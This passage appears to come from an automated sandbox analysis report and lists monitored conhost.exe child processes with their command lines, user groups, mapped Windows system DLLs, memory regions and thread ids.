"ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2478 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 126 os_tid = 0xedc Thread: id = 171 os_tid = 0xff8 Thread: id = 201 os_tid = 0x1010 Thread: id = 269 os_tid = 0x1164 Process: id = "96" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf6c8000" os_pid = "0xee0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "53" os_parent_pid = "0xd7c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2036 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2037 start_va = 0x3d9fce0000 end_va = 0x3d9fcfffff entry_point = 0x0 region_type = private name = "private_0x0000003d9fce0000" filename = "" Region: id = 2038 start_va = 0x3d9fd00000 end_va = 0x3d9fd13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003d9fd00000" filename = "" Region: id = 2039 start_va = 0x3d9fd20000 end_va = 0x3d9fd5ffff entry_point = 0x0 region_type = private name = "private_0x0000003d9fd20000" filename = "" Region: id = 2040 start_va = 0x7df5ff860000 end_va = 0x7ff5ff85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff860000" filename = "" Region: id = 2041 start_va = 0x7ff6c3960000 end_va = 0x7ff6c3982fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3960000" filename = "" Region: id = 2042 start_va = 0x7ff6c398d000 end_va = 0x7ff6c398dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c398d000" filename = "" Region: id = 2043 start_va = 0x7ff6c398e000 end_va = 0x7ff6c398ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c398e000" filename = "" Region: id = 2044 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2045 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2046 start_va = 0x3d9fdd0000 end_va = 0x3d9fecffff entry_point = 0x0 region_type = private name = "private_0x0000003d9fdd0000" filename = "" Region: id = 2047 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2048 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3368 start_va = 0x3d9fce0000 end_va = 0x3d9fceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003d9fce0000" filename = "" Region: id = 3369 start_va = 0x3d9fcf0000 end_va = 0x3d9fcf6fff entry_point = 0x0 region_type = private name = "private_0x0000003d9fcf0000" filename = "" Region: id = 3370 start_va = 0x3d9fd60000 end_va = 0x3d9fd9ffff entry_point = 0x0 region_type = private name = "private_0x0000003d9fd60000" filename = "" Region: id = 3371 start_va = 0x3d9fda0000 end_va = 0x3d9fda0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003d9fda0000" filename = "" Region: id = 3372 start_va = 0x3d9fdb0000 end_va = 0x3d9fdb6fff entry_point = 0x0 region_type = private name = "private_0x0000003d9fdb0000" filename = "" Region: id = 3373 start_va = 0x3d9fdc0000 end_va = 0x3d9fdc0fff entry_point = 0x0 region_type = private name = "private_0x0000003d9fdc0000" filename = "" Region: id = 3374 start_va = 0x3d9fed0000 end_va = 0x3d9ff8dfff entry_point = 0x3d9fed0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3375 start_va = 0x3d9ff90000 end_va = 0x3da0117fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003d9ff90000" filename = "" Region: id = 3376 start_va = 0x3da0120000 end_va = 0x3da0120fff entry_point = 0x0 region_type = private name = "private_0x0000003da0120000" filename = "" Region: id = 3377 start_va = 0x3da0180000 end_va = 0x3da018ffff entry_point = 0x0 region_type = private name = "private_0x0000003da0180000" filename = "" Region: id = 3378 start_va = 0x3da0190000 end_va = 0x3da0310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003da0190000" filename = "" Region: id = 3379 start_va = 0x3da0320000 end_va = 0x3da171ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003da0320000" filename = "" Region: id = 3380 start_va = 0x7ff6c3860000 end_va = 0x7ff6c395ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3860000" filename = "" Region: id = 3381 start_va = 0x7ff6c398b000 end_va = 0x7ff6c398cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c398b000" filename = "" Region: id = 3382 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3383 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3384 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3385 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3386 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3387 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3388 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3389 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3390 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3391 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3392 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3393 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4164 start_va = 0x3da0130000 end_va = 0x3da016ffff entry_point = 0x0 region_type = private name = "private_0x0000003da0130000" filename = "" Region: id = 4165 start_va = 0x3da17b0000 end_va = 0x3da17bffff entry_point = 0x0 region_type = private name = "private_0x0000003da17b0000" filename = "" Region: id = 4166 start_va = 0x3da17c0000 end_va = 0x3da18c8fff entry_point = 0x0 region_type = private name = "private_0x0000003da17c0000" filename = "" Region: id = 4167 start_va = 0x3da1900000 end_va = 0x3da190ffff entry_point = 0x0 region_type = private name = "private_0x0000003da1900000" filename = "" Region: id = 4168 start_va = 0x3da1910000 end_va = 0x3da1c46fff entry_point = 0x3da1910000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4169 start_va = 0x3da1c50000 end_va = 0x3da1e67fff entry_point = 0x0 region_type = private name = "private_0x0000003da1c50000" filename = "" Region: id = 4170 start_va = 0x3da1e70000 end_va = 0x3da2085fff entry_point = 0x0 region_type = private name = "private_0x0000003da1e70000" filename = "" Region: id = 4171 start_va = 0x3da2090000 end_va = 0x3da22a6fff entry_point = 0x0 region_type = private name = "private_0x0000003da2090000" filename = "" Region: id = 4172 start_va = 0x3da22b0000 end_va = 0x3da23b8fff entry_point = 0x0 region_type = private name = "private_0x0000003da22b0000" filename = "" Region: id = 4173 start_va = 0x7ff6c3989000 end_va = 0x7ff6c398afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3989000" filename = "" Region: id = 4174 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4175 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4176 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4177 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4178 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4179 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4180 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4181 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4182 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 127 os_tid = 0xee4 Thread: id = 172 os_tid = 0xffc Thread: id = 238 os_tid = 0x10bc Thread: id = 282 os_tid = 0x1198 Process: id = "97" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x638d3000" os_pid = "0xee8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "54" os_parent_pid = "0xd84" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2049 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2050 start_va = 0x91998a0000 end_va = 0x91998bffff entry_point = 0x0 region_type = private name = "private_0x00000091998a0000" filename = "" Region: id = 2051 start_va = 0x91998c0000 end_va = 0x91998d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000091998c0000" filename = "" Region: id = 2052 start_va = 0x91998e0000 end_va = 0x919991ffff entry_point = 0x0 region_type = private name = "private_0x00000091998e0000" filename = "" Region: id = 2053 start_va = 0x7df5ff120000 end_va = 0x7ff5ff11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff120000" filename = "" Region: id = 2054 start_va = 0x7ff6c3e60000 end_va = 0x7ff6c3e82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e60000" filename = "" Region: id = 2055 start_va = 0x7ff6c3e88000 end_va = 0x7ff6c3e88fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e88000" filename = "" Region: id = 2056 start_va = 0x7ff6c3e8e000 end_va = 0x7ff6c3e8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e8e000" filename = "" Region: id = 2057 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2058 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2059 start_va = 0x9199ad0000 end_va = 0x9199bcffff entry_point = 0x0 region_type = private name = "private_0x0000009199ad0000" filename = "" Region: id = 2060 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2061 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2874 start_va = 0x91998a0000 end_va = 0x91998affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000091998a0000" filename = "" Region: id = 2875 start_va = 0x91998b0000 end_va = 0x91998b6fff entry_point = 0x0 region_type = private name = "private_0x00000091998b0000" filename = "" Region: id = 2876 start_va = 0x9199920000 end_va = 0x91999ddfff entry_point = 0x9199920000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2877 start_va = 0x91999e0000 end_va = 0x9199a1ffff entry_point = 0x0 region_type = private name = "private_0x00000091999e0000" filename = "" Region: id = 2878 start_va = 0x9199a20000 end_va = 0x9199a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009199a20000" filename = "" Region: id = 2879 start_va = 0x9199a30000 end_va = 0x9199a36fff entry_point = 0x0 region_type = private name = "private_0x0000009199a30000" filename = "" Region: id = 2880 start_va = 0x9199a40000 end_va = 0x9199a40fff entry_point = 0x0 region_type = private name = "private_0x0000009199a40000" filename = "" Region: id = 2881 start_va = 0x9199a50000 end_va = 0x9199a50fff entry_point = 0x0 region_type = private name = "private_0x0000009199a50000" filename = "" Region: id = 2882 start_va = 0x9199ce0000 end_va = 0x9199ceffff entry_point = 0x0 region_type = private name = "private_0x0000009199ce0000" filename = "" Region: id = 2883 start_va = 0x9199cf0000 end_va = 0x9199e77fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009199cf0000" filename = "" Region: id = 2884 start_va = 0x9199e80000 end_va = 0x919a000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009199e80000" filename = "" Region: id = 2885 start_va = 0x919a010000 end_va = 0x919b40ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000919a010000" filename = "" Region: id = 2886 start_va = 0x7ff6c3d60000 end_va = 0x7ff6c3e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d60000" filename = "" Region: id = 2887 start_va = 0x7ff6c3e8c000 end_va = 0x7ff6c3e8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e8c000" filename = "" Region: id = 2888 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2889 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2890 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2891 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2892 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2893 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2894 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2895 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2896 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2897 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2898 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2899 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4569 start_va = 0x9199a60000 end_va = 0x9199a9ffff entry_point = 0x0 region_type = private name = "private_0x0000009199a60000" filename = "" Region: id = 4570 start_va = 0x9199cb0000 end_va = 0x9199cbffff entry_point = 0x0 region_type = private name = "private_0x0000009199cb0000" filename = "" Region: id = 4571 start_va = 0x919b410000 end_va = 0x919b526fff entry_point = 0x0 region_type = private name = "private_0x000000919b410000" filename = "" Region: id = 4572 start_va = 0x919b580000 end_va = 0x919b58ffff entry_point = 0x0 region_type = private name = "private_0x000000919b580000" filename = "" Region: id = 4573 start_va = 0x919b590000 end_va = 0x919b8c6fff entry_point = 0x919b590000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4574 start_va = 0x919b8d0000 end_va = 0x919bae5fff entry_point = 0x0 region_type = private name = "private_0x000000919b8d0000" filename = "" Region: id = 4575 start_va = 0x919baf0000 end_va = 0x919bd0bfff entry_point = 0x0 region_type = private name = "private_0x000000919baf0000" filename = "" Region: id = 4576 start_va = 0x919bd10000 end_va = 0x919bf21fff entry_point = 0x0 region_type = private name = "private_0x000000919bd10000" filename = "" Region: id = 4577 start_va = 0x919bf30000 end_va = 0x919c043fff entry_point = 0x0 region_type = private name = "private_0x000000919bf30000" filename = "" Region: id = 4578 start_va = 0x7ff6c3e8a000 end_va = 0x7ff6c3e8bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e8a000" filename = "" Region: id = 4579 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4580 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4581 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4582 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4583 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4584 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4585 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4586 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4587 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 128 os_tid = 0xeec Thread: id = 173 os_tid = 0x790 Thread: id = 220 os_tid = 0x1074 Thread: id = 302 os_tid = 0x11e8 Process: id = "98" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7660c000" os_pid = "0xef0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "55" os_parent_pid = "0xd8c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2062 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2063 start_va = 0xd2fcfc0000 end_va = 0xd2fcfdffff entry_point = 0x0 region_type = private name = "private_0x000000d2fcfc0000" filename = "" Region: id = 2064 start_va = 0xd2fcfe0000 end_va = 0xd2fcff3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d2fcfe0000" filename = "" Region: id = 2065 start_va = 0xd2fd000000 end_va = 0xd2fd03ffff entry_point = 0x0 region_type = private name = "private_0x000000d2fd000000" filename = "" Region: id = 2066 start_va = 0x7df5ff5a0000 end_va = 0x7ff5ff59ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5a0000" filename = "" Region: id = 2067 start_va = 0x7ff6c3c90000 end_va = 0x7ff6c3cb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3c90000" filename = "" Region: id = 2068 start_va = 0x7ff6c3cbd000 end_va = 0x7ff6c3cbefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3cbd000" filename = "" Region: id = 2069 start_va = 0x7ff6c3cbf000 end_va = 0x7ff6c3cbffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3cbf000" filename = "" Region: id = 2070 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2071 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2072 start_va = 0xd2fd1c0000 end_va = 0xd2fd2bffff entry_point = 0x0 region_type = private name = "private_0x000000d2fd1c0000" filename = "" Region: id = 2073 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2074 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3549 start_va = 0xd2fcfc0000 end_va = 0xd2fcfcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d2fcfc0000" filename = "" Region: id = 3550 start_va = 0xd2fcfd0000 end_va = 0xd2fcfd6fff entry_point = 0x0 region_type = private name = "private_0x000000d2fcfd0000" filename = "" Region: id = 3551 start_va = 0xd2fd040000 end_va = 0xd2fd0fdfff entry_point = 0xd2fd040000 region_type = mapped_file name = "locale.nls" filename = 